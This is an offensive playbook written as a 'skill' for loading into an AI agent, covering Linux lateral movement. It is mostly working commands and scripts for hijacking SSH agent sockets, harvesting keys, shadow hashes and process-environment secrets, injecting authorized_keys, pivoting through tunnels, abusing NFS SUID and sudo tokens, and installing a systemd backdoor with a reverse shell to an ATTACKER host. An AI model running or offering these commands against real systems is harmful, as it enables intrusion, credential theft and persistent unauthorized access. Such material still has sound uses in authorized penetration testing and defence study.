linux-lateral-movement
# SKILL: Linux Lateral Movement — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert Linux lateral movement techniques. Covers SSH agent hijacking, key harvesting, credential locations, D-Bus exploitation, network pivoting, sudo token reuse, and systemd manipulation. Base models miss SSH_AUTH_SOCK hijacking and ptrace-based sudo session hijack.
## 0. RELATED ROUTING

Before going deep, consider loading:

- linux-privilege-escalation if you need root on the current host before pivoting
- linux-security-bypass when restricted shells or security modules block lateral movement tools
- container-escape-techniques when the target network includes containerized hosts
- kubernetes-pentesting when pivoting into a Kubernetes cluster
- unauthorized-access-common-services for exploiting discovered internal services (Redis, MongoDB, etc.)
## 1. SSH AGENT HIJACKING

### 1.1 Find SSH Agent Sockets

The socket lives in a 0700 directory owned by the agent's user, so you need root or that user's UID to reach it.

```bash
# As root (or a user with access to other users' processes):
find /tmp -path "*/ssh-*" -name "agent.*" 2>/dev/null

# Or via /proc (environ is NUL-separated; -a stops grep from reporting "binary file matches"):
grep -a -r SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'

# Typical path: /tmp/ssh-XXXXXX/agent.PID
```

### 1.2 Hijack Agent Forwarding

```bash
# Point our SSH client at the found socket
export SSH_AUTH_SOCK=/tmp/ssh-AbCdEf/agent.12345

# List keys the agent holds
# exit 0: keys listed, 1: agent reachable but empty, 2: cannot contact the agent (permissions or stale socket)
ssh-add -l

# If keys appear, the agent will sign for us: SSH to any host it can authenticate to
ssh -o StrictHostKeyChecking=no user@internal-host

# The agent owner gets no prompt: the private key never touches this host, we only relay
# signing requests through their forwarded agent. Two caveats: the login still appears in
# the target's sshd auth log, and agents loaded with `ssh-add -h` destination constraints
# (OpenSSH 8.9+) refuse to sign for hosts outside the permitted path.
```

### 1.3 Persistent Agent Monitoring

```bash
# Monitor for new SSH agent sockets (wait for an admin to SSH in with agent forwarding)
inotifywait -m /tmp -e create 2>/dev/null | grep ssh-

# Or poll (create the marker first; -newer fails on the first pass otherwise):
touch /tmp/.marker
while true; do
    find /tmp -path "*/ssh-*" -name "agent.*" -newer /tmp/.marker 2>/dev/null
    touch /tmp/.marker
    sleep 5
done
```
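
The three steps above as one script. This is an added example, not code from the original playbook: it reads `SSH_AUTH_SOCK` out of every readable `/proc/<pid>/environ`, de-duplicates the socket paths, and classifies each socket by the `ssh-add -l` exit code (0 keys, 1 no identities, 2 unreachable). The `proc_root` argument is an assumption introduced so the parser can be exercised against a constructed directory tree; it assumes GNU coreutils and OpenSSH's `ssh-add`.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): enumerate SSH agent sockets via /proc
# and report which ones currently hold usable keys.

# Print the SSH_AUTH_SOCK value from one NUL-separated environ file (nothing if absent/unreadable).
auth_sock_from_environ() {
    tr '\0' '\n' < "$1" 2>/dev/null | sed -n 's/^SSH_AUTH_SOCK=//p' | head -n 1
}

# Unique socket paths across all processes. $1 lets the caller point at a fake /proc tree.
collect_agent_socks() {
    local proc_root="${1:-/proc}" d
    for d in "$proc_root"/[0-9]*; do
        [ -r "$d/environ" ] && auth_sock_from_environ "$d/environ"
    done | sort -u
    return 0
}

# Classify one socket. Prints "<state> <owner> <path>" with state in keys|empty|unreachable|missing.
probe_agent_sock() {
    local sock="$1" owner state rc=0
    if [ ! -S "$sock" ]; then
        printf 'missing - %s\n' "$sock"
        return 0
    fi
    owner=$(stat -c '%U' "$sock" 2>/dev/null || echo '?')
    SSH_AUTH_SOCK="$sock" ssh-add -l >/dev/null 2>&1 || rc=$?
    case $rc in
        0) state=keys ;;          # at least one identity: export SSH_AUTH_SOCK and go
        1) state=empty ;;         # reachable, but the agent holds nothing right now
        *) state=unreachable ;;   # 0700 socket dir we cannot enter, or a stale socket
    esac
    printf '%s %s %s\n' "$state" "$owner" "$sock"
}

# Only the sockets worth hijacking.
hijackable_agents() {
    local proc_root="${1:-/proc}" sock
    collect_agent_socks "$proc_root" | while IFS= read -r sock; do
        probe_agent_sock "$sock"
    done | awk '$1 == "keys" { print $3 }'
    return 0
}

# Usage: bash agents.sh --scan   (run as root for sockets of other users)
if [ "$#" -gt 0 ] && [ "$1" = "--scan" ]; then
    collect_agent_socks | while IFS= read -r s; do probe_agent_sock "$s"; done
fi
```

Run it in a loop (or from the inotifywait pipeline above) to catch forwarded agents that appear when an admin logs in; a socket that reads `empty` can still turn into `keys` later if the owner adds identities.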
---

## 2. SSH KEY HARVESTING

### 2.1 Private Key Locations

```bash
find / -type f \( -name "id_rsa" -o -name "id_ed25519" -o -name "*.pem" -o -name "*.key" \) 2>/dev/null
```

Also: /etc/ssh/ssh_host_*_key (host private keys: copying them lets you impersonate this host for MITM against clients that already trust it), /home/*/.ssh/id_*

```bash
# Find keys without a passphrase (ssh-keygen -y only succeeds when the empty passphrase decrypts the key):
find / -type f -name "id_*" ! -name "*.pub" 2>/dev/null | while IFS= read -r key; do
    ssh-keygen -y -P "" -f "$key" > /dev/null 2>&1 && echo "NO PASSPHRASE: $key"
done
```

### 2.2 known_hosts Parsing

```bash
# known_hosts is often hashed (Debian/Ubuntu ship HashKnownHosts yes):
cat ~/.ssh/known_hosts

# Hashed entries look like |1|<salt>|<hmac>; test candidate IPs/names against them one at a time:
ssh-keygen -F 10.0.0.1 -f ~/.ssh/known_hosts

# Unhashed known_hosts gives a direct IP/hostname list
awk '{print $1}' ~/.ssh/known_hosts | sort -u

# Extract all hostnames/IPs from all users' known_hosts
cat /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null \
    | awk '{print $1}' | tr ',' '\n' | sort -u
```
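
The `awk '{print $1}'` extraction above breaks on `@cert-authority`/`@revoked` marker lines and `[host]:port` entries, and says nothing about hashed lines. The script below is an added example, not code from the original page: `known_hosts_targets` handles those forms, and `crack_hashed` does what `ssh-keygen -F` does for one host, but for a whole candidate list offline, using the documented hashed format (`|1|base64(salt)|base64(HMAC-SHA1(key=salt, msg=hostname))`). It assumes bash and the `openssl` CLI; the file names in the usage line are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): known_hosts parsing and offline matching of hashed entries.

# Plain hostnames/IPs from a known_hosts file: drops comments and hashed lines, strips @marker
# prefixes, splits comma lists, and unwraps [host]:port.
known_hosts_targets() {
    local f="$1" line field h hosts
    while IFS= read -r line || [ -n "$line" ]; do
        line="${line#"${line%%[![:space:]]*}"}"          # trim leading whitespace
        [ -z "$line" ] && continue
        case "$line" in \#*) continue ;; esac
        [ "${line:0:1}" = "@" ] && line="${line#* }"    # @cert-authority / @revoked marker
        field="${line%% *}"
        case "$field" in '|1|'*) continue ;; esac       # hashed: see crack_hashed
        IFS=',' read -ra hosts <<< "$field"
        for h in "${hosts[@]}"; do
            h="${h#[}"; h="${h%%]:*}"                   # [10.0.0.5]:2222 -> 10.0.0.5
            printf '%s\n' "$h"
        done
    done < "$f" | sort -u
}

# Hash one hostname the way OpenSSH does: |1|<salt b64>|<HMAC-SHA1(salt, host) b64>
hash_host() {
    local host="$1" salt_b64="$2" salt_hex mac_b64
    salt_hex=$(printf '%s' "$salt_b64" | openssl base64 -d -A | od -An -tx1 | tr -d ' \n')
    mac_b64=$(printf '%s' "$host" | openssl dgst -sha1 -mac HMAC -macopt "hexkey:$salt_hex" -binary \
              | openssl base64 -A)
    printf '|1|%s|%s\n' "$salt_b64" "$mac_b64"
}

# Dictionary attack: for every hashed entry, try each candidate from $2 with that entry's salt.
crack_hashed() {
    local f="$1" cands="$2" line field salt_b64 cand
    while IFS= read -r line || [ -n "$line" ]; do
        [ "${line:0:1}" = "@" ] && line="${line#* }"
        field="${line%% *}"
        case "$field" in '|1|'*) ;; *) continue ;; esac
        salt_b64="${field#|1|}"; salt_b64="${salt_b64%%|*}"
        while IFS= read -r cand || [ -n "$cand" ]; do
            [ -z "$cand" ] && continue
            [ "$(hash_host "$cand" "$salt_b64")" = "$field" ] && printf '%s\n' "$cand"
        done < "$cands"
    done < "$f" | sort -u
}

# Usage: known_hosts_targets ~/.ssh/known_hosts; crack_hashed ~/.ssh/known_hosts candidates.txt
# A good candidate list: every hostname from unhashed files, /etc/hosts, DNS, and the /24s you found in 5.3.
if [ "$#" -eq 2 ]; then
    known_hosts_targets "$1"
    crack_hashed "$1" "$2"
fi
```

Each hashed line carries its own salt, so the work is candidates × hashed lines; that is still trivial for a few thousand names, which is why hashing known_hosts only slows an attacker who has no idea of the internal naming scheme.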
### 2.3 authorized_keys Injection

```bash
# Generate attacker keypair (on attacker box)
ssh-keygen -t ed25519 -f /tmp/pivot_key -N ""

# Inject public key (on compromised host)
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /root/.ssh/authorized_keys
echo "ssh-ed25519 AAAA...attacker_pubkey..." >> /home/admin/.ssh/authorized_keys

# SSH back in with our key
ssh -i /tmp/pivot_key root@target
```

Before relying on it, check three things in sshd_config (or `sshd -T` as root): `AuthorizedKeysFile` may point somewhere other than `~/.ssh/authorized_keys`; `StrictModes yes` (the default) makes sshd ignore the file if it, `~/.ssh`, or the home directory is group/world-writable, so keep 700/600 permissions and the right owner; and `PermitRootLogin no` blocks root entirely (the default `prohibit-password` still allows keys).
---

## 3. CREDENTIAL HARVESTING LOCATIONS

### 3.1 System Credentials

| Location | Contents | Command |
|---|---|---|
| `/etc/shadow` | Password hashes (root only) | `cat /etc/shadow` |
| `/etc/passwd` | User list, may contain hashes on legacy systems | `cat /etc/passwd` |
| `~/.bash_history` | Command history (passwords in cleartext) | `grep -iE "pass\|ssh\|mysql\|curl" /home/*/.bash_history /root/.bash_history` |
| `~/.mysql_history` | MySQL commands with passwords | `cat ~/.mysql_history` |
| `~/.psql_history` | PostgreSQL commands | `cat ~/.psql_history` |
| `~/.pgpass` | PostgreSQL password file (`host:port:db:user:password`) | `cat ~/.pgpass` |
| `~/.my.cnf` | MySQL credentials (`[client]` section) | `cat ~/.my.cnf` |
| `~/.netrc` | FTP/HTTP auto-login credentials | `cat ~/.netrc` |
| `~/.git-credentials` | Git HTTPS passwords (URL-encoded, in the URL) | `cat ~/.git-credentials` |

### 3.2 Environment & Config Files

```bash
# Current process secrets
env | grep -iE "pass|key|secret|token|api|cred|auth"

# All process environments (root). environ is NUL-separated, hence the tr; the sed keeps the PID with each hit.
for pid in /proc/[0-9]*; do
    tr '\0' '\n' < "$pid/environ" 2>/dev/null | grep -iE "pass|key|secret|token" | sed "s|^|${pid#/proc/}: |"
done

# Application configs (common credential locations):
find /var/www /opt /srv \( -name "wp-config.php" -o -name "settings.py" \
    -o -name "*.env" -o -name "database.yml" -o -name "docker-compose.yml" \) 2>/dev/null

# Keyrings & secret stores:
find / \( -name "*.keyring" -o -name ".vault-token" -o -path "*/.password-store/*.gpg" \) 2>/dev/null
```
---

## 4. D-BUS EXPLOITATION

### 4.1 Enumerate D-Bus Services

```bash
# List system bus services
dbus-send --system --dest=org.freedesktop.DBus \
    --type=method_call --print-reply \
    /org/freedesktop/DBus org.freedesktop.DBus.ListNames

# List session bus services
# Session buses are per user: to talk to another user's bus you need their DBUS_SESSION_BUS_ADDRESS
# (/run/user/UID/bus on systemd hosts), which also shows up in /proc/PID/environ.
dbus-send --session --dest=org.freedesktop.DBus \
    --type=method_call --print-reply \
    /org/freedesktop/DBus org.freedesktop.DBus.ListNames

# Introspect a service (find available methods)
dbus-send --system --dest=org.freedesktop.systemd1 \
    --type=method_call --print-reply \
    /org/freedesktop/systemd1 org.freedesktop.DBus.Introspectable.Introspect
```

On systemd hosts `busctl list` and `busctl introspect <name> <path>` give the same information in readable form.

### 4.2 Abuse systemd & PolicyKit via D-Bus

```bash
# Start a service via D-Bus (if policy allows). StartUnit is gated by the polkit action
# org.freedesktop.systemd1.manage-units, which defaults to auth_admin_keep, so from an
# unprivileged user this only works where that policy or a local rule has been loosened.
dbus-send --system --dest=org.freedesktop.systemd1 \
    --type=method_call --print-reply /org/freedesktop/systemd1 \
    org.freedesktop.systemd1.Manager.StartUnit \
    string:"malicious.service" string:"replace"

# polkit actions available without auth (that is where the loosened policies show up):
pkaction --verbose 2>/dev/null | grep -B5 "implicit active: yes"
```
---

## 5. INTERNAL NETWORK PIVOTING

### 5.1 SSH Tunneling

```bash
# Local port forward: reach INTERNAL_HOST:3306 via localhost:3306 on the attacker box
ssh -L 3306:INTERNAL_HOST:3306 pivot@compromised-host

# Remote port forward: expose an attacker-side service on the pivot host
# (ATTACKER is resolved on the client side, so localhost works too). The listener binds to the
# pivot's loopback unless sshd has GatewayPorts yes; only then does -R 0.0.0.0:8080:... expose it
# to the rest of the internal network.
ssh -R 8080:ATTACKER:8080 pivot@compromised-host

# Dynamic SOCKS proxy: route tool traffic through the pivot
ssh -D 1080 pivot@compromised-host
# Then: proxychains nmap -sT -Pn INTERNAL_RANGE
# (SOCKS carries TCP only: use connect scans and skip the ICMP host discovery)

# SSH over SSH (multi-hop):
ssh -J user1@hop1,user2@hop2 target@final-host
```

### 5.2 Without SSH — Alternative Tunnels

```bash
# socat port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL_HOST:80 &

# ncat relay
ncat -l -p 8080 --sh-exec "ncat INTERNAL_HOST 80"

# /dev/tcp (Bash built-in, no tools needed)
exec 3<>/dev/tcp/INTERNAL_HOST/80
echo -e "GET / HTTP/1.0\r\nHost: INTERNAL_HOST\r\n\r\n" >&3
cat <&3
exec 3>&-

# chisel (SOCKS proxy over HTTP)
# On attacker: chisel server -p 8080 --reverse
# On target:   chisel client ATTACKER:8080 R:socks
# The SOCKS listener then appears on the attacker side at 127.0.0.1:1080
```

### 5.3 Network Discovery from Compromised Host

```bash
ss -tlnp && ss -tnp                         # Listening & established connections
arp -a; ip neigh                            # Known adjacent hosts (arp is often missing on minimal images; ip neigh is the current form)
cat /etc/resolv.conf                        # DNS servers
dig axfr internal.domain @dns 2>/dev/null   # Zone transfer (rarely permitted, cheap to try)

# Subnet sweep (bash-only, no tools):
for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i &>/dev/null && echo "ALIVE: 10.0.0.$i" & done; wait

# Port scan via /dev/tcp. Wrap each probe in timeout: a filtered port otherwise blocks
# for the kernel's full SYN retry window (around two minutes).
for port in 22 80 443 3306 5432 6379 8080; do
    timeout 1 bash -c "echo >/dev/tcp/10.0.0.1/$port" 2>/dev/null && echo "OPEN: $port"
done
```
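
The sweep and port-scan loops above run serially and, without a timeout, stall on every filtered port. The script below is an added example, not code from the original page: a bounded, parallel TCP connect sweep built only on bash's `/dev/tcp` and coreutils' `timeout`, with a /24 expander so it covers the ranges found via `ip neigh` and `resolv.conf`. It assumes a Linux host with bash 4+ and coreutils; the addresses in the usage line are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): bounded, parallel TCP connect sweep using /dev/tcp.

# Print "host:port" if a TCP connect succeeds within the timeout; print nothing otherwise.
# timeout kills the probe (exit 124) on filtered ports instead of waiting for the SYN retries.
probe_port() {
    local host="$1" port="$2" secs="${3:-1}"
    if timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
        printf '%s:%s\n' "$host" "$port"
    fi
    return 0
}

# Expand a /24 (e.g. 10.0.0.0/24) to its 254 host addresses, one per line.
expand_cidr24() {
    local base="${1%/24}" i
    base="${base%.*}"
    for i in $(seq 1 254); do printf '%s.%d\n' "$base" "$i"; done
}

# sweep "host list" "port list" [timeout] [max parallel]
# Probes run in batches of $4 so a /24 x 10 ports finishes in seconds rather than the serial worst case.
sweep() {
    local hosts="$1" ports="$2" secs="${3:-1}" par="${4:-64}" h p n=0
    for h in $hosts; do
        for p in $ports; do
            probe_port "$h" "$p" "$secs" &
            n=$((n + 1))
            if [ "$n" -ge "$par" ]; then wait; n=0; fi
        done
    done
    wait
}

# Usage: bash sweep.sh 10.0.0.0/24 "22 80 443 3306 5432 6379 8080"
if [ "$#" -ge 2 ]; then
    sweep "$(expand_cidr24 "$1")" "$2" "${3:-1}" | sort -t: -k1,1 -k2,2n
fi
```

Connect scans complete the handshake, so every hit lands in the target's accept logs; keep the port list short and the batch size modest if noise matters.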
---

## 6. SHARED FILESYSTEM EXPLOITATION

### 6.1 NFS Mounts

```bash
# Discover NFS shares
showmount -e FILESERVER_IP 2>/dev/null

# Mount it. no_root_squash is set server-side in /etc/exports; from the client you confirm it by
# creating a file as root and checking the owner (root = not squashed, nobody/nfsnobody = squashed).
mkdir -p /mnt/nfs && mount -t nfs FILESERVER_IP:/share /mnt/nfs
touch /mnt/nfs/.probe && ls -l /mnt/nfs/.probe

# If no_root_squash: create SUID binaries visible to other hosts
# Every host mounting the same share without nosuid → SUID binary = root on all of them
cp /bin/bash /mnt/nfs/bash && chmod +s /mnt/nfs/bash
# On the other host run /mnt/nfs/bash -p (-p keeps the effective UID; bash drops it otherwise).
# The copied binary must match that host's architecture and libc.
```

### 6.2 SMB/CIFS Shares

```bash
# Enumerate shares
smbclient -L //FILESERVER_IP/ -N 2>/dev/null        # Null session
smbclient -L //FILESERVER_IP/ -U 'user%password'

# Mount and search for credentials
mount -t cifs //FILESERVER_IP/share /mnt/smb -o username=user,password=pass
find /mnt/smb \( -name "*.conf" -o -name "*.cfg" -o -name "*.kdbx" \
    -o -name "*.xlsx" -o -name "*.docx" \) 2>/dev/null
```
---

## 7. SUDO TOKEN REUSE (ptrace-Based)

```bash
# Preconditions:
#  - another user has an active sudo session (timestamp not expired; sudo's default timestamp_timeout is 15 minutes)
#  - we can ptrace one of their processes: root, or the same UID with kernel.yama.ptrace_scope=0
#    (the common default of 1 only allows attaching to descendants, so same-UID attacks usually still need root)

# Check sudo timestamp files:
ls -la /var/run/sudo/ts/ 2>/dev/null     # Linux
ls -la /var/lib/sudo/ts/ 2>/dev/null     # older Debian/Ubuntu builds
ls -la /var/db/sudo/ 2>/dev/null         # BSD/macOS
# Files here mean active sudo tokens. By default (timestamp_type=tty) a token is bound to the
# user AND the tty it was granted on, so the injected command must run on that tty.

# ptrace-based hijack:
#  1. Attach to the user's shell process on the tty that holds the token (gdb, or a custom ptrace injector)
#  2. Inject: sudo /bin/bash
#  3. The injected sudo runs as that user on that tty → inherits the valid timestamp → no password needed

# Automated tool: sudo_inject
# Injects into processes with valid sudo tokens
```
---

## 8. SYSTEMD SERVICE MANIPULATION

```bash
# Find writable unit files:
find /etc/systemd /usr/lib/systemd -writable -name "*.service" 2>/dev/null

# Inject into an existing service (add ExecStartPre= to a writable unit, then systemctl daemon-reload;
# the command runs as root the next time the unit starts)

# Or create a new one: /etc/systemd/system/backdoor.service
# Type=simple rather than oneshot: with oneshot, `systemctl start` blocks until the reverse shell
# exits, and enable needs the [Install] section or it has nothing to hook.
cat > /etc/systemd/system/backdoor.service <<'EOF'
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'

[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload && systemctl enable --now backdoor.service
```
---

## 9. LATERAL MOVEMENT DECISION TREE

```
Compromised host — where to move next?
│
├── SSH credentials available?
│   ├── Private keys found? → try on all known_hosts targets (§2)
│   ├── SSH agent running? → hijack socket (§1)
│   ├── Passwords in history/configs? → spray across hosts (§3)
│   └── authorized_keys writable on other hosts? → inject key (§2.3)
│
├── Network services discovered?
│   ├── Internal web apps? → tunnel + attack (§5.1)
│   ├── Databases (3306/5432/6379)? → check harvested creds (§3)
│   ├── SMB/NFS shares? → mount + search for creds/SUID (§6)
│   └── Kubernetes API (6443)? → load kubernetes-pentesting skill
│
├── Can reach other hosts?
│   ├── Direct SSH? → use keys/passwords
│   ├── Firewalled? → SSH tunnel or chisel (§5)
│   └── No tools? → /dev/tcp + bash (§5.2)
│
├── Root on current host?
│   ├── Read /etc/shadow → crack hashes → password reuse (§3)
│   ├── Dump /proc/*/environ → find service credentials (§3.2)
│   ├── Hijack sudo tokens → piggyback admin sessions (§7)
│   └── Modify systemd services → backdoor (§8)
│
├── D-Bus services available?
│   ├── Privileged services exposed? → method call abuse (§4)
│   └── polkit actions without auth? → privileged actions (§4.2)
│
└── No obvious path?
    ├── ARP scan + port sweep internal network (§5.3)
    ├── Passive credential sniffing (if cap_net_raw)
    ├── Wait for admin SSH → agent hijack (§1.3)
    └── Check for cloud metadata (169.254.169.254)
```